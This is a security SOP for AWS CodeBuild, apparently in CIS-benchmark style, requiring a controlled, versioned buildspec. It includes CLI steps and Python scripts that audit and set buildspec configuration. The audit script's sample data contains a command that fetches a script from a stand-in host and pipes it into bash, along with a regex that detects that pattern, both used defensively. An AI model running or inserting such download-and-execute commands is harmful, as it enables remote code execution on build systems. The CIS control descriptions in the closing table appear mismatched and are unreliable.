Profile Applicability:

  • Level 1

Description:

In AWS CodeBuild, the buildspec file defines the build commands and settings for the project. This file is critical for the consistency and security of build processes. Using an uncontrolled or custom buildspec file can result in unauthorized actions or unintended consequences during the build process. This SOP ensures that all CodeBuild projects use a controlled buildspec file that is versioned, stored in a secure repository, and follows security best practices.

Rationale:

  • Security: A controlled buildspec ensures that only authorized and intended build commands are executed, reducing the risk of unintended commands or insecure actions being executed during the build process.

  • Consistency: Ensures that the same build process is followed across different environments (e.g., development, staging, production).

  • Auditability: A controlled and versioned buildspec provides an auditable record of the build process, which is essential for debugging, compliance, and tracking changes over time.

  • Governance: Ensures that all teams adhere to the same build process, which helps maintain operational standards.

Impact:

Pros:

  • Enhanced Security: Mitigates the risk of executing malicious or insecure build commands.

  • Consistency: Ensures that the same build process is followed consistently across projects.

  • Audit Trail: Provides a clear history of changes to the buildspec file, which is valuable for troubleshooting and compliance.

Cons:

  • Management Overhead: Requires additional effort to ensure that the buildspec file is controlled, versioned, and stored securely.

  • Limited Flexibility: Some flexibility might be lost as developers may need to adhere to predefined build specifications.

Default Value:

By default, a CodeBuild project reads buildspec.yml from the root of its source. The project configuration can instead point at an alternate path in the repository, at a buildspec object in S3 (referenced by object ARN), or carry the YAML inline. Nothing in the service restricts which of these is used, so compliance depends on organizational policy controlling where the buildspec lives and who can change it.

Pre-requisite:

  • AWS IAM Permissions:

    • codebuild:CreateProject

    • codebuild:UpdateProject

    • codebuild:BatchGetProjects

  • AWS CLI installed and configured.

  • Ensure that the CodeBuild project is using an approved buildspec file that is either stored within the source code repository or defined in a secure location.

  • Ensure the source repository is secured and controlled (e.g., using GitHub, AWS CodeCommit, or another version-controlled system).

Test Plan:

Using AWS Console:

  1. Sign in to the AWS Management Console.

  2. Navigate to AWS CodeBuild under Services.

  3. In the CodeBuild Dashboard, select Projects.

  4. Choose the CodeBuild project to check.

  5. Under the Buildspec section, ensure that the buildspec is defined as one of the following:

    • A reference to a buildspec file located in the source code repository (e.g., buildspec.yml).

    • An inline buildspec defined explicitly in the CodeBuild project configuration (acceptable only where the project definition itself is managed as code, because inline content is not versioned anywhere else).

  6. Verify that the referenced or inline buildspec file follows the organizational policy, is controlled, and is versioned.

Using AWS CLI:

  1. To check which buildspec a CodeBuild project uses, query the buildspec field of the project source (it is nested under source, not a top-level project attribute):

    aws codebuild batch-get-projects --names <project-name> --query 'projects[0].source.buildspec' --output text

  2. Review the output:

  • If the output is None (or empty), the project uses buildspec.yml at the root of the source; confirm that this file is the controlled one and that the repository is protected against unreviewed changes.

  • If the output contains inline buildspec YAML, check that its contents align with organizational security standards and that the project definition itself is managed as code, since inline content is not versioned anywhere else.

  • If the output is a path or an S3 object ARN (arn:aws:s3:::<bucket>/<key>), ensure the referenced file lives in a controlled, versioned location and is not writable by the build role or by unrelated principals.
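The following script is an added example and is not part of the original SOP or of any AWS tooling. It applies the review steps above to the JSON that aws codebuild batch-get-projects prints, classifying each project's source.buildspec value the way CodeBuild interprets it (default root file, repository path, S3 object ARN, or inline YAML) and checking it against a hypothetical organizational policy. The sample output, the project names, the repository URLs and the allowlists in POLICY are all constructed for the example; replace them with your own, and feed it real output with aws codebuild batch-get-projects --names ... > projects.json.

```python
"""Classify and audit the buildspec setting of CodeBuild projects.

Input is the JSON that `aws codebuild batch-get-projects` prints. The sample
below is constructed for this example and does not come from a real account.
"""
import json
import re

# Constructed sample in the shape of `aws codebuild batch-get-projects` output.
SAMPLE_BATCH_GET_PROJECTS = json.dumps({
    "projects": [
        {   # file reference inside the repository, on the approved list
            "name": "api-build",
            "source": {"type": "CODECOMMIT",
                       "location": "https://git-codecommit.us-east-1.amazonaws.com/v1/repos/api",
                       "buildspec": "ci/buildspec.yml"},
        },
        {   # no buildspec key: CodeBuild uses buildspec.yml at the source root
            "name": "legacy-build",
            "source": {"type": "GITHUB", "location": "https://github.com/example-org/legacy.git"},
        },
        {   # inline YAML that pipes a download straight into a shell
            "name": "adhoc-build",
            "source": {"type": "GITHUB", "location": "https://github.com/example-org/adhoc.git",
                       "buildspec": "version: 0.2\nphases:\n  build:\n    commands:\n"
                                    "      - curl -s https://example.invalid/run.sh | bash\n"},
        },
        {   # buildspec held in an S3 bucket outside the approved prefix
            "name": "infra-build",
            "source": {"type": "S3", "location": "example-source-bucket/infra.zip",
                       "buildspec": "arn:aws:s3:::someone-elses-bucket/buildspec.yml"},
        },
    ],
    "projectsNotFound": [],
})

# Hypothetical organizational policy; adjust the allowlists to your own repositories.
POLICY = {
    "allowed_paths": {"buildspec.yml", "ci/buildspec.yml"},
    "allowed_s3_prefixes": ("arn:aws:s3:::example-buildspecs/",),
    "allow_inline": False,
}

# A command shape an approved buildspec should never contain (illustrative, not exhaustive).
RISKY_COMMAND = re.compile(r"(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")


def classify_buildspec(value):
    """Map the source.buildspec field to how CodeBuild will interpret it.

    Assumed interpretation (matches the documented CodeBuild options): an S3 object
    ARN points at a buildspec in S3, text containing newlines is inline YAML, any
    other value is a path relative to the source root, and an empty value means
    buildspec.yml at the root.
    """
    if not value:
        return "default"
    if value.startswith("arn:aws:s3:::"):
        return "s3"
    if "\n" in value:
        return "inline"
    return "path"


def check_project(project, policy):
    """Return the list of policy findings for one project entry (empty means compliant)."""
    name = project["name"]
    value = project.get("source", {}).get("buildspec", "")
    kind = classify_buildspec(value)
    findings = []
    if kind == "default":
        if "buildspec.yml" not in policy["allowed_paths"]:
            findings.append(f"{name}: relies on default buildspec.yml, which is not an approved path")
    elif kind == "path":
        if value not in policy["allowed_paths"]:
            findings.append(f"{name}: buildspec path {value!r} is not on the approved list")
    elif kind == "s3":
        if not value.startswith(policy["allowed_s3_prefixes"]):
            findings.append(f"{name}: buildspec {value!r} is outside the approved S3 location")
    elif kind == "inline":
        if not policy["allow_inline"]:
            findings.append(f"{name}: inline buildspec is not versioned in a repository")
        if RISKY_COMMAND.search(value):
            findings.append(f"{name}: inline buildspec pipes a download into a shell")
    return findings


def audit(batch_get_projects_json, policy=POLICY):
    """Audit every project in batch-get-projects output; returns {name: [findings]}."""
    data = json.loads(batch_get_projects_json)
    return {p["name"]: check_project(p, policy) for p in data["projects"]}


if __name__ == "__main__":
    for name, findings in audit(SAMPLE_BATCH_GET_PROJECTS).items():
        print(("PASS " if not findings else "FAIL ") + name)
        for finding in findings:
            print("   - " + finding)
```

Run it against real output with python3 audit_buildspec.py after replacing SAMPLE_BATCH_GET_PROJECTS with the contents of projects.json; a non-empty findings list is the condition the Test Plan treats as non-compliant. The inline-YAML pattern check is only a smoke test; the real control is the allow_inline flag, because inline content has no repository history to audit.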

Implementation Steps:

Using AWS Console:

  1. Log in to the AWS Management Console and navigate to AWS CodeBuild.

  2. In the CodeBuild Dashboard, select Projects and choose the CodeBuild project for which you want to configure a controlled buildspec.

  3. Click Edit.

  4. Under the Buildspec section:

    • Option 1: If using a file from the source repository, ensure the buildspec file is stored in a version-controlled repository, and the project configuration refers to it.

    • Option 2: If using an inline buildspec, ensure that the inline commands follow security best practices and organizational guidelines, and that the project definition itself is managed as code (for example, CloudFormation or Terraform), since inline content is not versioned anywhere else.

  5. Save the configuration by clicking Update Project.

Using AWS CLI:

  1. To associate a controlled buildspec file stored in the repository, set the buildspec field of the project source (there is no separate --buildspec option; update-project replaces the whole source object, so include every source setting the project needs, not only the buildspec):

    aws codebuild update-project --name <project-name> --source "type=CODECOMMIT,location=<repository-url>,buildspec=<path/to/buildspec.yml>"

    To reference a buildspec kept in an approved S3 bucket instead, use its object ARN as the value (for example buildspec=arn:aws:s3:::<bucket>/<path>/buildspec.yml).

  2. To configure an inline buildspec, put the YAML in a JSON request file so that its line breaks are preserved (a one-line shorthand value would be read as a file path, not as YAML), for example update-project.json:

    {
      "name": "<project-name>",
      "source": {
        "type": "CODECOMMIT",
        "location": "<repository-url>",
        "buildspec": "version: 0.2\nphases:\n  install:\n    commands:\n      - echo Hello World\n"
      }
    }

    Then apply it with:

    aws codebuild update-project --cli-input-json file://update-project.json
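As an added example (not part of the original SOP and not AWS code), the script below builds the --cli-input-json payload for the implementation step above. It writes the buildspec into the source object exactly as update-project expects, keeps the newlines of an inline buildspec intact, and refuses to emit an inline buildspec whose SHA-256 digest has not been recorded as approved, so that the inline path still goes through change control. The buildspec text, the project name and the repository URL are constructed placeholders.

```python
"""Build the --cli-input-json payload that pins a CodeBuild project to a controlled buildspec.

The `source` block is shaped as `aws codebuild update-project` expects it: the
buildspec is a field of `source` and may be a repository path, an S3 object ARN
(arn:aws:s3:::bucket/key), or inline YAML with its newlines preserved.
"""
import hashlib
import json

# Constructed controlled buildspec, as it would be checked into the repository.
CONTROLLED_BUILDSPEC = """version: 0.2
phases:
  install:
    commands:
      - echo Hello World
"""


def buildspec_digest(text):
    """SHA-256 of the buildspec text; record this value in change control when approving it."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def validate_buildspec_text(text):
    """Cheap structural checks before pushing inline YAML into a project (no YAML parser needed)."""
    lines = text.splitlines()
    if not lines or lines[0].strip() != "version: 0.2":
        raise ValueError("buildspec must declare 'version: 0.2' on its first line")
    if "phases:" not in text:
        raise ValueError("buildspec has no phases section")
    return True


def update_project_payload(name, source_type, location, buildspec, approved_digests=()):
    """Return the dict to pass via --cli-input-json.

    `buildspec` may be a path relative to the source root, an S3 object ARN, or
    inline YAML. Inline text (detected by the presence of newlines) is accepted
    only when its digest is on the approved list, so an unreviewed edit cannot
    slip into the project configuration.
    """
    if "\n" in buildspec:
        validate_buildspec_text(buildspec)
        digest = buildspec_digest(buildspec)
        if digest not in approved_digests:
            raise ValueError("inline buildspec digest %s is not approved" % digest)
    return {
        "name": name,
        # update-project replaces the whole source object, so every source
        # field the project needs must be present here, not only buildspec.
        "source": {"type": source_type, "location": location, "buildspec": buildspec},
    }


def write_payload(path, payload):
    """Serialize for `aws codebuild update-project --cli-input-json file://<path>`."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(payload, fh, indent=2)
    return path


if __name__ == "__main__":
    approved = {buildspec_digest(CONTROLLED_BUILDSPEC)}
    # Hypothetical project name and repository URL.
    payload = update_project_payload(
        "example-project",
        "CODECOMMIT",
        "https://git-codecommit.us-east-1.amazonaws.com/v1/repos/example",
        CONTROLLED_BUILDSPEC,
        approved_digests=approved,
    )
    print(json.dumps(payload, indent=2))
    # Next step, outside this script:
    #   aws codebuild update-project --cli-input-json file://update-project.json
```

Run the script, redirect its output to update-project.json (or call write_payload), and pass the file with --cli-input-json. Because json.dump escapes the line breaks as \n inside the JSON string, the YAML reaches CodeBuild with its structure intact, which the single-line shorthand form cannot guarantee.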

Backout Plan:

Using AWS Console:

  1. If using a controlled buildspec.yml causes issues, sign in to the AWS Management Console.

  2. Navigate to AWS CodeBuild, select the project, click Edit, and go to the Buildspec section.

  3. Switch back to the previous buildspec setting (for example, "Use a buildspec file" with the default buildspec.yml at the root of the source) or restore the previous inline contents.

  4. Save the changes and monitor the build process to ensure it functions as expected.

Using AWS CLI:

  1. To revert to the default buildspec.yml at the root of the source, re-issue the project's source configuration without a buildspec field (the source argument replaces the existing source object, so keep the type, location and any other source settings the project needs):

    aws codebuild update-project --name <PROJECT_NAME> --source "type=<SOURCE_TYPE>,location=<REPO_URL>"

  2. Verify that the project no longer carries an explicit buildspec setting (the query prints None when the default root buildspec.yml is in use):

    aws codebuild batch-get-projects --names <PROJECT_NAME> --query 'projects[0].source.buildspec' --output text

References:

CIS Controls Mapping:

Version | Control ID | Control Description | IG1 | IG2 | IG3
v8 | 3.4 | Encrypt Data on End-User Devices – Ensure data encryption during file system access. | | |
v8 | 6.7 | Implement Application Layer Filtering and Content Control – Ensure appropriate content filtering is applied to sensitive files. | | |
v8 | 6.8 | Define and Maintain Role-Based Access Control – Implement and manage role-based access for file systems. | | |
v8 | 14.6 | Protect Information Through Access Control Lists – Apply strict access control to file systems. | | |